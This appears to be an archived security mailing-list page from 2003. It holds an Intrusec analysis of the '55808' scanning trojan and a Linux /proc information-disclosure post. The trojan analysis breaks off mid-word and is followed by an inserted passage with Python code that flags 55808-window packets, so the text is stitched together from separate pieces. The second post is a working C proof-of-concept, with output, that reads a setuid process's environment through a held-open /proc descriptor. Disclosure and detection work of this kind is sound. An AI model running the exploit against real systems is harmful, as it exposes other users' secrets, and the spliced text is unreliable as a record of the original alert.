Intrusec 55808 Trojan Analysis

2003-06-21 Thread David J. Meltzer
Intrusec Alert: 55808 Trojan Analysis

Initial Release: 6/19/03 4:30PM EDT
Latest Update: 6/19/03 11:13PM EDT

- Corrected analysis regarding use of sequence numbers to change IP
address.
- Added reference to alternate name "Stumbler" given to trojan by
Internet Security Systems subsequent to the release of Intrusec's
analysis.


Introduction:

Intrusec has completed an initial analysis of a trojan that appears to
be one of several that is responsible for generating substantial
scanning traffic across the Internet with a TCP window size of 55808.
The trojan we have isolated appears to match many of the characteristics
that others in the security community have reported for this trojan.
However, we do not believe that the specific trojan we have identified
is the sole source of the traffic generated, and do not know that it is
a primary source. 

The information we've been able to gather leads us to believe that the
trojan we have captured is not the original source of the 55808 traffic
that has been seen, but is rather a "copycat", created to mimic the
behavior of another trojan or worm. The behavior of this copycat appears
to be based on press releases, news articles, and mailing lists that
described its hypothetical behavior and known output. Nonetheless, this
copycat trojan appears to be actively deployed on systems across the
Internet and is something security professionals should be aware of.
Details contained in this analysis will be updated, and linked to
numerous analyses that will be done by other security researchers, as
they become available.

Please visit and link to http://www.intrusec.com/55808.html to receive
the latest information available regarding this trojan.  There is apt
to be great
discussion about the nature of this "trojan" and whether in fact it is
accurately characterized as a trojan, backdoor, zombie, or worm. While
the specific binaries we have captured are probably described as a
trojan or zombie, there is no assurance that other variants of this
trojan may not be far more malicious in nature and contain worm or
backdoor functionality. We are referring to the trojan we have captured,
and the presumed other existing trojans generating similar traffic as
"55808 Trojans," and the specific binary we have analyzed as "55808
Trojan - Variant A." All discussion in our analysis section refers
specifically to the 'A' variant we have captured.  Internet Security
Systems subsequent to the release of this alert dubbed this "Stumbler",
and refers to this same trojan by that name.


Analysis:

This trojan aims to be a distributed port scanner whose presence is very
difficult to detect. It port scans random addresses across the IP
address space, with a random source address also spoofed. By spoofing
the source address, the trojan is able to avoid easy detection, but it
also means it can not receive the results of the TCP SYN that is sent.
However, since the trojan also sniffs the network it is on in
promiscuous mode, it is likely, over time, to pick up scans from other
installations of trojans that randomly selected a source address that
happened to be on its subnet. As the number of trojans installed across
the Internet grows, more spoofed packets will be sent out by each
trojan, and more of the spoofed source addresses will be captured by
other trojans. 

Each time a reply to a trojan is seen, indicating an open port has been
found, it is written to a file and saved. Daily, the trojan will then
deliver the list of open ports it recorded while sniffing to a file and
deliver that file to a predefined IP address.

In addition, a specially crafted packet can be sent to the subnet the
trojan is listening on which contains in its sequence number the IP
address the trojan should deliver the open port list to daily.  However,
in the current incarnations of this trojan this functionality appears to
be disabled.

Finally, the trojan contains a feature whereby if it fails to connect to
the IP address it is supposed to deliver its open ports list to, it will
automatically attempt to remove itself from the system.

The trojan we have identified has been a file named 'a' that resides in
/tmp/.../a on the filesystem. Its packet collection activity monitors
for any packet with a window size of 55808 and records all packets
matching that window size. The packet capture is written to its current
directory (/tmp/.../ typically) in a file named 'r'. 

There is a default IP address of 12.108.65.76 that the trojan attempts
to make a standard connection (not spoofed) to on TCP port 22 and
deliver the packet capture after it has been running for 24 hours,
however this appears to have been randomly selected as it is not an
active system on the Internet, and it is potentially dynamically
modifiable by a packet that can be sent to the trojan.

The trojan appears to contain some functionality to change the IP
address it delivers its packet captures to, but this functionality is
not operational in the troj
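The alert's detection criterion is simple: every packet of this family carries a TCP window size of 55808, and a control packet may carry the delivery address in its sequence number. The following is an added example (not part of the Intrusec alert) that parses raw IPv4/TCP headers, flags packets with that window size, and renders the sequence number as a dotted quad for the analyst; the sample packets are constructed, and the 12.108.65.76 value is the alert's stated default delivery address.

```python
import struct
import ipaddress

SUSPECT_WINDOW = 55808  # window size reported for the 55808 trojan family

def parse_ipv4_tcp(pkt: bytes):
    """Parse an IPv4 packet carrying TCP; return header fields or None."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 6 or len(pkt) < ihl + 20:   # protocol 6 = TCP
        return None
    sport, dport, seq, _ack, off_flags, window = struct.unpack(
        "!HHIIHH", pkt[ihl:ihl + 16])
    return {"src": str(ipaddress.IPv4Address(pkt[12:16])),
            "dst": str(ipaddress.IPv4Address(pkt[16:20])),
            "sport": sport, "dport": dport, "seq": seq,
            "flags": off_flags & 0x1FF, "window": window}

def flag_55808(packets):
    """Return parsed packets whose TCP window matches the trojan signature."""
    hits = []
    for pkt in packets:
        p = parse_ipv4_tcp(pkt)
        if p and p["window"] == SUSPECT_WINDOW:
            # The alert describes a control packet whose sequence number
            # encodes an IP address; show that reading for the analyst.
            p["seq_as_ip"] = str(ipaddress.IPv4Address(p["seq"]))
            hits.append(p)
    return hits

def build_syn(src, dst, sport, dport, seq, window):
    """Construct a minimal IPv4+TCP SYN (checksums left zero) for the demo."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0,
                     ipaddress.IPv4Address(src).packed,
                     ipaddress.IPv4Address(dst).packed)
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, 0,
                      (5 << 12) | 0x02, window, 0, 0)   # data offset 5, SYN
    return ip + tcp

# Constructed sample: one ordinary SYN and one 55808-style scan packet
# whose sequence number spells out 12.108.65.76 (0x0C6C414C).
SAMPLE = [
    build_syn("10.0.0.5", "192.0.2.10", 4321, 80, 0x12345678, 5840),
    build_syn("198.51.100.7", "192.0.2.20", 1025, 22, 0x0C6C414C, 55808),
]

if __name__ == "__main__":
    for hit in flag_55808(SAMPLE):
        print(f"55808 scan {hit['src']}:{hit['sport']} -> {hit['dst']}:{hit['dport']}"
              f" seq-as-ip={hit['seq_as_ip']}")
```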

Linux /proc sensitive information disclosure

2003-06-21 Thread Paul Starzetz
Hello,

attached a simple proof of concept for the /proc filesystem disclosing 
sensitive information.

I noticed that opening an entry from /proc/self/ and keeping the file 
open while executing a setuid binary prevents the opened proc entry from 
changing the ownership from the initial user to the set-uid value. 
However I'm not very sure about the impact of this bug (feature), the 
attached code just reads the environment (which is per default mode 400).

The technique can not be applied to /proc/self/mem because the permission 
checks are made dynamically (the child must be ptraced etc.).

This is a sample output of the PoC:

[EMAIL PROTECTED]:~/dev/expl> ./procex

parent executing setuid
PING 127.0.0.1 (127.0.0.1) from 127.0.0.1 : 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.066 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.061 ms
child reads parent's proc:
PWD=/home/paul/..
Content of /proc/32353
ls: /proc/32353/cwd: Permission denied
ls: /proc/32353/root: Permission denied
ls: /proc/32353/exe: Permission denied
-r--r--r--    1 root     root            0 Jun 20 14:47 cmdline
lrwxrwxrwx    1 root     root            0 Jun 20 14:47 cwd
-r--------    1 paul     users           0 Jun 20 14:47 environ [*]
lrwxrwxrwx    1 root     root            0 Jun 20 14:47 exe
[...]
-r--r--r--    1 root     root            0 Jun 20 14:47 status
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.060 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% loss, time 1998ms
rtt min/avg/max/mdev = 0.060/0.062/0.066/0.007 ms
[*] as you can see here the ownership didn't change...

/ih

/*********************************************
 *                                           *
 *   Linux /proc information disclosure PoC  *
 *   by IhaQueR                              *
 *                                           *
 *********************************************/

/* The header names were stripped by the archive; these are the ones
   the code below actually needs. */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>

static char buf[128];

/* Report an error (via perror if errno is set) and exit. */
void fatal(const char *msg)
{
    printf("\n");
    if (!errno) {
        fprintf(stderr, "FATAL: %s\n", msg);
    } else {
        perror(msg);
    }

    printf("\n");
    fflush(stdout);
    fflush(stderr);
    exit(129);
}

int main()
{
    int fd, r;
    char c;
    pid_t pid;

    /* Open our own environ entry while still running as the ordinary user. */
    sprintf(buf, "/proc/%d/environ", getpid());
    fd = open(buf, O_RDONLY);
    if (fd >= 0) {
        /* buf now names the parent's /proc directory (pid taken before fork). */
        sprintf(buf, "/proc/%d", getpid());
        pid = fork();
        if (pid < 0)
            fatal("fork");
        if (pid) {
            /* Parent: exec a setuid binary, so its /proc entries should
               become root-owned from here on. */
            printf("\nparent executing setuid\n");
            fflush(stdout);
            execl("/bin/ping", "ping", "-c", "3", "127.0.0.1", NULL);
            fatal("execl");
        } else {
            /* Child: the inherited, already-open fd still reads the
               parent's environ after the parent has become setuid. */
            sleep(1);
            printf("\nchild reads parent's proc:\n");
            fflush(stdout);
            while (1) {
                r = read(fd, &c, 1);
                if (r <= 0)
                    break;
                printf("%c", c);
            }
            printf("\n\nContent of %s\n", buf);
            fflush(stdout);
            execl("/bin/ls", "ls", "-l", buf, NULL);
            fatal("execl");
        }
    } else
        fatal("open proc");

    printf("\n");
    fflush(stdout);

    return 0;
}